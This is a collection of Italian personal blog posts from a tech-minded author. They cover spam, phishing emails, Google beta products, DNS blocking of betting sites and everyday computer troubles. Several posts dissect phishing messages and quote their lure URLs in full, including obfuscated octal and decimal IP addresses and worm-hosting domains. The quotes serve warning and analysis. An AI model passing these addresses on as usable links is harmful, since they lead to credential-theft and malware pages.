Ogni tanto ci provo, a riaprire la possibilità di mettere trackback a questo blog; il guaio è che - a differenza dei commenti - con questa vecchia versione di Movable Type non ho la possibilità di fare una verifica preventiva, e quindi lo spam si intrufola con una velocità che ha dell'incredibile, nonostante i post più vecchi di una settimana siano generalmente chiusi. Ma quello che mi è capitato ieri non sono ancora riuscito a capirlo. Mi è arrivato infatti un trackback da angelwingsbluw.moissanite-earrings.info, che punta a un file .php con il nome uguale al titolo della mia notiziola. Sono andato a vedere il sito, e ci sono semplicemente una mezza dozzina di post presi dalla rete: un paio in giapponese, altri due in spagnolo, il mio in italiano, e uno in inglese. Alcuni sono pubblicità, altri no. Il sito è infine molto minimalista, e ha giusto un puntatore a Technorati. E qui casca l'asino, direte: vuole crescere in classifica. Beh, per farlo prima dovrebbe registrarsi: il link porta a una pagina d'errore. In realtà, se andiamo sul dominio padre moissanite-earrings.info, scopriamo che ci sono vari siti, ma tutti con questa struttura: il mistero si infittisce, ma prometto che stanotte dormirò lo stesso.

Aggiornamento: come volevasi dimostrare. In dieci minuti, due commenti farlocchi, e un trackback da un altro sito di quel tipo. Gli IP sono 154.35.1.12 nel primo caso, 154.35.1.12 stavolta, e 147.162.44.6 per i due test. Sono sorvegliato peggio che dalla NSA.

Sto cercando di prenotare due posti sul treno che domenica ci potrebbe riportare a Milano dal mare (impresa improba: l'interfaccia web del servizio acquisti è così intelligente da farti arrivare fino in fondo in un tripudio di javascript ciascuno dei quali ti fa aspettare cinque o sei secondi, per poi dirti "oh, non ci sono posti di questo tipo. Vuoi ricominciare da capo?") Ma non è di questo che voglio parlare.
Erano alcuni mesi che non mi connettevo al sito, e quando ho messo userid e password mi arriva una finestra che mi dice di cambiarla, perché era di 7 caratteri e adesso ci vogliono da almeno 8. Bene; scrivo password vecchia password nuova e password nuova ripetuta, clicco su "avanti" e ... mi arriva la spernacchiata "userid o password errata".
Dopo avere telefonato al carissimo (nel senso di prezzo) 89.20.21, ho probabilmente capito cosa succede. Il sistema accetta solo password da almeno otto caratteri; visto che la mia vecchia password era di sette, dava una segnalazione di errore. Dopo che da call center mi hanno cambiato la password con una più lunga, la modifica è passata senza alcun problema. Genialità, non c'è dubbio!

Ormai non bastano più le banche. L'ultimo messaggio di phishing mi è arrivato (su un account che non uso) nientemeno che da Amazon, che avrebbe bisogno di "più informazioni sul mio business" perché probabilmente il mio account "è stato usato da una terza parte".
Il sito a cui bisognerebbe accedere secondo i nostri amichetti è http://0310.0124.0214.0362/ www.amazon.com_gp_yourstore-ref-pd_irl_gw_002-3587922-7621600ie-UTF8/
index.htm&urlHash=-1.394526455072826E285
(tutto attaccato, ho messo degli spazi per non allungare troppo la riga). Trovo molto interessante usare un indirizzo IP con i numeri scritti in ottale, anche se questo significa che né Firefox né IE riescono a connettersi al sito; inoltre il mio senso matematico rabbrividisce a vedere un hash scritto in notazione scientifica :-)
Ma tutto questo è nulla rispetto alla domanda principe: quanta gente può avere un conto su Amazon?

Dando un'occhiata agli indirizzi che arrivano al mio sito, ho scoperto delle cose molto strane. Ci sono per la precisione due categorie di indirizzi sospetti. Il primo vede come esempi http://3.maligiorni.com/appuntocopiato/, http://61.spb-maps.org/immaginibuffe/, http://www932.adluvio.net/accordopianoforte/: come si può notare, il nome del sito ha sempre un numero, e poi si ha come parola chiave una stringa di ricerca. La cosa strana è che mettere un semplice www al posto del numero fa uscire fuori un "not found". Il secondo tipo invece vede esempi del tipo http://sito/engine/go.php?casino, dove "sito" è ad esempio i.fisdcrer.it oppure www.estinzioneumana.it, e "casino" è una strana stringa codificata, che inizia con un sito simile a quello dato - ad esempio, to=http://www10.4t_fisdcrer.it-4g__h6_2.com/d/sr/ - e continua con una serie di parametri. A differenza del caso precedente, se uno prova a digitare queste URL gli viene chiesto un cookie di sessione, e la pagina che viene ritornata è compressa (e quindi salvata in una locazione temporanea sul vostro PC).
Potrebbero essere semplici motori di ricerca pubblicitari messi su nomi a dominio a parcheggio (il che però mi fa pensare che è strano essere contattati così per caso), o forse no. Meglio comunque non verificare.

io ho un paio di caselle gmail (codogno e maurizio.codogno) che ho creato ma non uso se non per farmi mandare automaticamente della roba che mi serve archiviare. Non sono assolutamente indicate da alcuna parte in rete, insomma.
Oggi mi sono collegato dopo alcuni mesi, e ho trovato una ventina di messaggi di spam su ciascuna casella. Qui c'è gente che prova davvero a caso le combinazioni cognome@gmail.com.

Beh, ricevere (all'indirizzo @tin.it) un messaggio dell'IRS che mi comunica di avere ottenuto un rimborso di ben 63.80$ è indubbiamente una notizia interessante. Ancora più interessante però è scoprire qual è il collegamento su cui devo cliccare per ottenere il mio agognato rimborso: per la precisione, http://www.ezenrecruit.com/~ezenjoy/ /  /index.html.
La cosa divertente è che ezenrecruit.com è un sito - direi coreano, così ad occhio - di reclutamento persone, e che - a giudicare dal formato dell'URL che ho indicato sopra con tutti gli spazi - è stato bucato dai phisher che poi vanno a posizionarsi in Romania - il sito finale è http://ap.ro/~tif/%20%20/IRS/refund/caseid886432/pas.php? seguito da una sfilza di opzioni che si direbbero un tentativo mal riuscito di fare una POST.
Ah, la globalizzazione!

L'ultimo spam, di quelli della serie "riciclaci il denaro sporco", arrivatomi.
Gli è che stavolta il testo non è una traduzione via babelfish, ma immagino di qualcuno che abbia imparato l'italiano sulla strada, con effetti esilaranti. Alcune perle:
"Creare a posto un ufficcio ativo in vigore :"
"Fare l?assistenza ai menager superiori nella realizzazione della spedizione finanziaria dai clienti"
"Per guardare attentamente la Sua dichiarazione , riempi, prego il quesionazio quale si trova giu è spediscalo indietro per nostro indirizzo elettronico"
"Semplicemente coppia questo questionario nella lettera a noi
( per rispondere a noi )"
Ma la parte davvero fantastica è il titolo del messaggio, che poi è quello della mia notiziola. Ti dicono subito che è tutta una combine!

L'ultima beta di Google non è null'altro che Excel messo in rete. Con grande fantasia il prodotto si chiama Google Spreadsheets, ed è disponibile in "beta limitata", il che vuol dire che ti dicono che non puoi accederci ma ti daranno loro l'invito quando avranno la possibilità. Posso però dire che ho fatto la richiesta ieri sera, e stanotte mi è arrivato l'invito, il che mi sa tanto significhi che è praticamente aperto a tutti.
Tenendo presente che io non ho mai capito esattamente come funzioni uno spreadsheet già dai tempi di VisiCalc, posso dare delle impressioni molto frammentarie. È lento, e in questo caso AJAX non aiuta molto; non ho capito come si possano dimensionare manualmente le caselle; non permette macro (il che è naturalmente un vantaggio), e soprattutto i fogli elettronici possono essere editati contemporaneamente da più persone, con una finestrella di talk dove ci si possono scambiare informazioni. Ecco, forse la vera novità è questo sistema di collaborazione, che permette di vedere davvero in pratica i sistemi di cui si parla tanto in questi ultimi anni. Mi chiedo se Google abbia già pensato di licenziare le tecnologie utilizzate in modo che un gruppo di lavoro possa avere il suo serverino locale per la gestione collaborativa dei documenti: la mia casella di email ringrazierebbe molto :-)

Come mi capita ogni tanto, sfrutto per atti molto privati il mio blog.
Cerco un programma di grafica che abbia queste caratteristiche:
- giri sotto windows
- sia freeware
- faccia poche cose (ergo, GIMP è completamente fuori target, non ho voglia di mettermi a studiarci su per una vita)

Per darvi un'idea, ho provato C.a.R. e Dia che non sono male (a parte lo startup time) però sono rispettivamente utili per costruzioni geometriche e diagrammi, e non mi permettono di fare facilmente quello che voglio (chessò, disegnini di un triangolo fatto di fiammiferi, oppure tante palle in una certa posizione relativa)
Consigli?

Gmail ha la buona abitudine di cancellare gli spam dopo un mese. Bene: posso dirvi che nell'ultimo mese mi sono arrivati 2742 messaggi di spam, di cui 154 solo dalla mezzanotte di ieri. La grande fregatura è che sembra che molti di questi messaggi abbiano trovato un sistema di passare attraverso i filtri di google, e quindi mi tocca comunque vederli. La seconda grande fregatura è che - se non ho fatto male i conti - tendo ad avere tre volte tanto spam quanti messaggi reali, comprese mailing list e altro. C'è qualcosa che non va.

Ho fatto una ricerca molto accurata nel registry del mio pc in ufficio, per capire perché da quando ho dovuto cambiare la password di accesso al proxy l'accesso mi si blocca sempre (ho qualche idea, ma voglio aspettare prima di presentarla al mio affezionato pubblico).
Tra i dati ivi presenti, ho trovato in HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Explorer \UserAssist \{un-GUID-che-è-inutile-riportare} questa stringa:
HRZR_EHACNGU:P:\Cebtenz Svyrf\abxevat\abxevat.rkr
Ora, il testo è evidentemente ROT13, come chiunque abbia frequentato Usenet negli anni '80 (e primi '90) sa. L'utilità della cosa non mi è molto chiara: qua dicono qualcosa in più.
Ma forse meglio ancora è trovare le stringhe drowssaP e resU, all'interno di HKEY_CURRENT_USER \Software \Microsoft \Windows Media \WMSDK \etacsufbO. Niente male come offuscamento!

Ieri sera cercavo di installare sul mio portatile di casa il convertitore USB-IRDA. Niente da fare; il PC mi dà E:\ is not accessible. Incorrect function. Però alcuni CD mi vengono letti, il che se ci si pensa è ancora più strano.
Una ricerca con google mi ha detto che il problema potrebbe essere con qualche software che ho installato ultimamente, tipo un bruciatore di CD, e di disinstallarlo. In realtà, l'unica aggiunta che ho fatto sono stati i programmi di gestione della nuova stampante, un'HP1410. Saranno stati loro?
Il vero guaio è che non sono riuscito a trovare un sistema per reinstallare solo il driver del cd. Misteri.

Tanto per spendere otto euro e novanta, mi sono comprato uno scatolotto che fa la conversione USB-IRDA: insomma un modo per connettersi via infrarossi al PC. La cosa è meno stupida di quanto possa sembrare a prima vista: in ufficio ho un desktop, senza porta infrarossi; a casa il PC di Anna non ce l'ha e sul mio non funziona più, quindi avevo dei problemi a copiare i dati dal mio Zaurus.
La cosa più strana è che, per la prima volta da un bel pezzo, ho dovuto utilizzare il CD di installazione. Sto iniziando a comprare cose troppo nuove?

Leggo oggi che Alfredo Cazzola, che per il secondo anno organizzerà lo SMAU, ha preso la grande decisione: quest'anno il salone sarà riservato agli operatori, e quindi anticipato di un giorno: sarà da mercoledì 4 a sabato 7 ottobre, nei nuovi padiglioni di Rho.
Subito l'opposizione DS si lamenta: Majorino sentenzia «È una scelta paradossale, perché al contrario, rispettando chiaramente le esigenze degli operatori, bisogna fare di tutto per rendere lo Smau ancora più fruibile e non più chiuso». Ora, non so se Majorino sia mai andato allo SMAU. Sono anni che io non ci metto più piede, proprio perché non è possibile riuscire ad avere informazioni tecniche data la massa di ragazzini in caccia di improbabili gadget. Magari questa sarà la volta buona...

Alessandro Longo ci fa sapere su Repubblica (sempre sulla notizia) che Assoprovider ha fatto ricorso al Tar del Lazio contro l'obbligo per i provider di bloccare l'accesso ai siti di scommesse che non hanno pagato il pizzo, pardon l'autorizzazione, all'Azienda Autonoma Monopoli di Stato. Per la cronaca, Assoprovider è l'associazione dei "piccoli" provider, a differenza di AIIP che è quella dei "grandi". Avevo già parlato del blocco e di quello che penso della cosa. Ciò detto, vorrei però fare notare che parlare di "blocco dell'IP", come fa Longo, è assolutamente fuorviante. Quello che viene bloccato è il DNS (quindi il nome con cui il sito è noto, non il numero d'indirizzo, che è appunto l'IP). Se proprio vogliamo essere pignoli, il DNS viene modificato in modo che sostituisca all'indirizzo IP corrispondente al sito "cattivo" quello corrispondente all'avviso di blocco; un po' come se il postino verificasse la città dove è spedita una lettera, e decidesse di cambiare il CAP di quelle dove il sindaco è della Lega mettendo al suo posto quello del Quirinale. E infatti, l'"espediente tecnico" accennato nell'articolo consiste semplicemente nel fare in modo che il nostro PC dica al server "no, non preoccuparti di dirmi qual è l'indirizzo di quel sito: faccio io".
Il fatto è che invece che scrivere "blocco IP" bastava dire "blocco sui nomi dei siti di scommesse", quindi il termine usato non è una semplificazione necessaria ma proprio un errore. Sarà stato forse fatto apposta perché l'ignaro lettore non avesse la più pallida idea di cosa è stato davvero fatto, sia mai che riuscisse ad aggirare il blocco?

Lo spam appena arrivatomi è il solito messaggio "devo portare via tanti soldi, se mi dai una mano te ne lascio un po'". La cosa più divertente è il modo in cui è stato detto. Infatti il mittente sarebbe un sergente dei Marines che è stato in Iraq, e invece che scrivere esplicitamente tutta la solita solfa - sa mai che un filtro antispam se ne accorgesse - ha preferito lasciare un link a un articolo sul sito della BBC. Sì, è una notizia di tre anni fa, ma tanto se uno ci casca va bene lo stesso.
Mi rimane da scoprire se www.propagation.net, il sito da cui il messaggio è stato spedito, è o no un paradiso per gli spammer.

Oggi City doveva proprio aver deciso di recuperare notizie lasciate perdere per le elezioni. Perché è pur vero che il comunicato stampa del Garante per la Privacy, che è andato da Google per fargli tutelare il diritto all'oblio, è apparso ieri; ma è anche vero che Anna Masera ne parlava sulla Stampa già domenica scorsa, e non credo avesse delle talpe dal Garante.
Di cosa si parla? Beh, una donna ha digitato il proprio nome su Google e ha scoperto che tra i vari link ce n'era uno a proposito di un procedimento penale che aveva subìto e da cui secondo City era andata assolta. (Secondo la Masera, la signora era stata invece condannata, la ricerca era avvenuta la scorsa estate e l'avvenimento era di sedici anni fa; a Zeus News parlavano dell'argomento in generale a febbraio 2005; tutto questo per dire che una ricerca non dà necessariamente risultati veriteri).
Il guaio è che è un po' duro dire che "il diritto delle persone ad essere rappresentate su Internet con informazioni esatte" si possa applicare così banalmente. Se ci si pensa su, quell'avvenimento è avvenuto, e non può essere cancellato in stile orwelliano; logica vorrebbe al limite dire "si mette un puntatore alle notizie aggiornate", ma come si può fare il tutto in maniera automatica?
Insomma, un bel casino. Chissà che si inventeranno a Mountain View.

Con un po' di ritardo rispetto alle aspettative, è uscita la versione Google dell'agenda: la trovate a http://www.google.com/calendar (o calendar.google.com se preferite)
Da un primissimo sguardo non mi pare ci sia nulla di sensazionale, se non la possibilità di avere più agende personali - così si può dare l'accesso a sezioni diverse a persone diverse - e naturalmente l'integrazione a gmail, oltre a cosette buffe come l'agenda mobile che ti fa sempre vedere i prossimi n giorni con n che definisci tu.
Come sempre occorre avere un account google: nel caso, basta chiedere e se ne fornisce uno. E come (quasi) sempre, al momento l'interfaccia è solo in inglese. Attenzione infine alla lentezza...

Se non sapete di Perl, lasciate pure perdere questo messaggio.
Non riesco a convincere HTTP::Request::Common a farmi fare una POST di un file WBXML (quindi binario e non testo). Se metto il Content-Type a qualcosa che non sia multipart/form-data, non appena trova un carattere non alfanumerico me lo converte in %xx; se metto form-data, il tutto mi viene incapsulato.
A qualcuno vengono delle idee? Nella peggiore delle ipotesi, editare Common.pm è considerato lecito.

Ieri su Repubblica (cartacea), in fondo a un articoletto che parlava dei finti appunti di Berlusconi, il lettore attento poteva scoprire che Beppe Grillo ha denunciato dal suo blog che l'Eni avrebbe oscurato il suo sito. La risposta dell'Eni, a parte avere scritto "idelogico" invece che "ideologico" - ma quello è un problema del correttore di bozze di Rep - è favolosa: «Siamo stati costretti a bloccare l'accesso a tutti i siti Internet non pertinenti l'attività lavorativa a causa dei frequenti attacchi degli hacker».
Bene. Vogliamo parlare di questi hacker che da dentro Eni attaccano i siti in giro per il mondo?
Occhei: a parte che avrebbero fatto meglio a dire "abbiamo bloccato tutto perché i dipendenti perdevano tempo a leggere il blog di Grillo", forse volevano dire che dalle connessioni http venivano scaricati troiani a pacchi. Niente male comunque.

Per due volte in una settimana mi è arrivato quello che quasi sicuramente è un worm. L'IP di provenienza è turco, il mittente è jkrey(at)isi.edu, che per il 99% dei miei lettori non significa nulla ma per il restante 1% rievoca ricordi di almeno 15 anni fa, e il testo consiste in tre foto - che però in realtà non esistono - e un file con il worm. La cosa strana è che il nome dell'attachment è Attachments00.HQX, e l'estensione hqx è tipica dei Mac. È però da dire che il Content-Type è application/x-msdownload, il che mi fa pensare che ormai anche un PC con windows sappia leggere questi file... ah, il progresso.

L'ultima beta degli amici "salvo-tutto-io" si chiama Google Pages e dovrebbe permettere a tutti di crearsi delle proprie pagine web, senza sapere nulla di HTML e affini. Beh, almeno in teoria.
Innanzitutto potrei sbagliarmi, ma non c'è localizzazione, e quindi tutte le istruzioni sono in inglese, che non è il massimo della vita per chi l'inglese non parla. Inoltre occorre un account gmail (ma questo non è un problema, se qualcuno ne ha bisogno di uno basta che me lo chieda) e venerdì scorso quando ho tentato di iscrivermi mi hanno detto che non c'era più spazio disponibile per nuovi iscritti - ma sabato funzionava senza ulteriori problemi.
L'interfaccia è scritta in AJAX, quindi la maggior parte del lavoro di editing viene fatto sul PC dell'utente, e ti devi ricordare di salvare ogni tanto il lavoro. L'interfaccia ha ancora un po' di problemi, ma sono comunque riuscito a copincollare una pagina del mio sito e metterla in linea qua. Secondo me è più la fatica che il risultato, ma devo ancora provare a vedere cosa succede con l'aggiornamento dei dati.
Ultima cosa per chi si chiede "Ma google non ha già la sua piattaforma blog?". Mi sembra una cosa diversa, qua ci sono più che altro pagine statiche e non un diario. Che poi sia utile, non lo so: 100 MB di spazio comunque io non li butto via :-)

Gli ex Monopoli di Stato, ora Amministrazione Autonoma dei Monopoli di Stato, hanno deciso che i siti di scommesse online che non pagano le tasse sulle vincite non devono essere raggiunti dall'Italia, come potete leggere qui [pdf] (questa, sempre in pdf, è invece la lista dei siti da bloccare).
La cosa non è bella non tanto per i siti in sé, quanto perché è passato il principio che l'internet provider deve bloccare l'accesso a un certo sito, più o meno come fanno in Cina.
A quanto mi si dice, però, ci sono dei problemucci tecnici, leggasi "non ci riescono mica" :-)

Ieri sera ho aggiornato la versione delle mie citazioni matematiche. Nell'ottica di un sempre migliore servizio al cliente :-), ho pensato che sarebbe stato utile aggiungere una pagina contenente solo le citazioni aggiunte. Fatto questo, ho aggiornato la mia homepage indicando nell'apposito riquadro le novità.
Stamattina ho controllato se qualcuno fosse passato a leggere la pagina. Bene, il log mostra due accessi. Uno è il mio alle 21:42; il secondo, alle 3:29 di stamattina, è questo.

66.249.71.54 - - [21/Feb/2006:03:29:41 +0100] "GET /mate/citazioni/new.html HTTP/1.0" 200 78203 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" 0 xmau.com

Arrendiamoci (o modifichiamo il nostro robots.txt).

Stamattina ero in crisi di astinenza, Gmail non funzionava. Dopo un'oretta e tanti ctrl-reload, mi è apparsa una schermata che mi rendeva noto della possibilità di salvare le conversazioni di Google Talk all'interno di Gmail. Ciò è bellissimo (non scherzo, io mi perdevo sempre perché passando dal pc di ufficio a quello di casa le conversazioni venivano spezzettate): peccato che la cosa funzionasse già da ieri sera e me la fossi già settata :-)
PS: sembra però che non riesca ancora a capire che se una persona è la stessa anche la conversazione dovrebbe essere la stessa... ah, queste beta!

Mi era capitato la scorsa primavera sul portatile. Mi è ricapitato oggi sul PC di ufficio. L'altra volta è durato fino ad agosto; stavolta chissà.
Il problema è che a volte quando clicco col tasto destro sull'URL di un file - da firefox - e voglio salvarlo, non riesco ad attraversare i link simbolici. Però gli stessi collegamenti funzionano da testo, e stavolta persino se sono veri hyperlink... misteri misteriosi.

Quando Google lanciò Gmail, lo slogan utilizzato era "non avrai più bisogno di cancellare nulla". Beh, naturalmente si sono accorti quasi subito che magari riuscire a cancellare lo spam non era una pessima idea, ma restava il fatto che se volevamo eliminare un messaggio che non ci interessava occorreva necessariamente scorrere un menu, indicare "send to trash", andare sulla vista "trash", e solo allora si poteva finalmente eliminarlo.
Bene. Qualche mese fa nell'interfaccia la frase "send to trash" è stata sostituita con "delete", e fin qua nulla di strano. Ma oggi è stato aggiunto il pulsantino Delete! Un cambiamento epocale, ve l'assicuro. Adesso voglio vedere se finalmente i messaggi nel cestino verranno cancellati automaticamente dopo un mese, come è sempre stato indicato nelle FAQ ma non è mai stato implementato. Magari anche Google sta finendo lo spazio disco :-)
Aggiornamento: (25 gennaio). Lo dice anche User Friendly.

Una spulciata sullo spam odierno mi ha fatto trovare un messaggio di un utente eBay che mi diceva che aveva tentato due volte di pagarmi, ma paypal aveva rifiutato l'ordine. Il messaggio - almeno presumo - era esattamente nel formato utilizzato da eBay. C'era solamente un banalissimo errore: il link relativo all'item che io avrei messo in vendita era indicato come (ho diviso il link lungo per lasciarlo leggere)
htps://cgi.ebay.co.uk /ws /eBayISAPI.dll?ViewItem &item=6436472319 &sspagename= ADME:B:AAQ:UK:1
Esatto: si sono dimenticati un'h una t nel nome del protocollo.
In realtà avevo già dato un'occhiata ai collegamenti interni, ed erano tutti del formato
http://3587681754 /ws /eBayISAPI_dllSignIn_co_partnerId_2 /pUserIdsiteid0_pageType_pa1_i1_bshowgif_UsingSSL_ru /eBayISAPI_pUserIdsiteid0_pageType/
dove si può notare l'indirizzo IP nascosto - si traducono i quattro numeri esadecimali in un numerone decimale - ma soprattutto il fatto che i nomi delle directory sembrano richiamare funzioni di eBay.
Per i curiosi, il messaggio è partito dall'indirizzo 194.12.246.79, e il sito indicato nel messaggio stesso è http://ehijdmonnndois.net/a/index.htm .

Già che ci sono, ricordo di non aprire gli auguri natalizi con link a www.funniestmoviesaround.biz e www.nice-movie-play.com; sono entrambi perlomeno worm e fors'anche virus.

Ieri sera, mentre tornavo a casa, c'era il mio vicino di pianerottolo che armeggiava alla porta. Già che c'ero, gli chiedo se per caso è lui che da alcuni mesi impedisce alle mie schede wi-fi - tranne la più vecchia, non so perché - di funzionare: ci sono infatti delle interferenze, che così ad occhio dipendono da un ripetitore Sky fuori norma. Lui mi dice che effettivamente ha un ripetitore Sky, ma che dovrebbe essere a norma. Gli chiedo comunque se può spegnerlo un attimo, così faccio una prova empirica. Nessun problema, mi dice; spegne, io entro in casa, accendo il mio pc, infilo la scheda... e funziona perfettamente.
Un non informatico avrebbe già dedotto che il problema era proprio il ripetitore. Io purtroppo ne so qualcosa in più, quindi sono tornato dal vicino a chiedergli se poteva riaccendere il ripetitore. L'ha fatto, e naturalmente la mia schedina ha continuato a funzionare. Già che c'ero, gli ho chiesto se poteva utilizzare un canale diverso, per vedere di separare il più possibile i due segnali; stasera scoprirò se la connessione regge ancora.

Riciclo da Luciano la presentazione di News Alloy, l'ennesimo nuovo programma per radunare in un posto solo gli aggiornamenti di tutti i blog che uno segue, e perdere tempo in una botta sola invece che girellando di qua e di là. E poi, a differenza di un portachiavi, questo non si perde!
La mia prima impressione è che abbiano clonato l'interfaccia di gmail, il che è Una Buona Cosa per chi come me vorrebbe ridurre il numero di cose diverse da tenere a mente.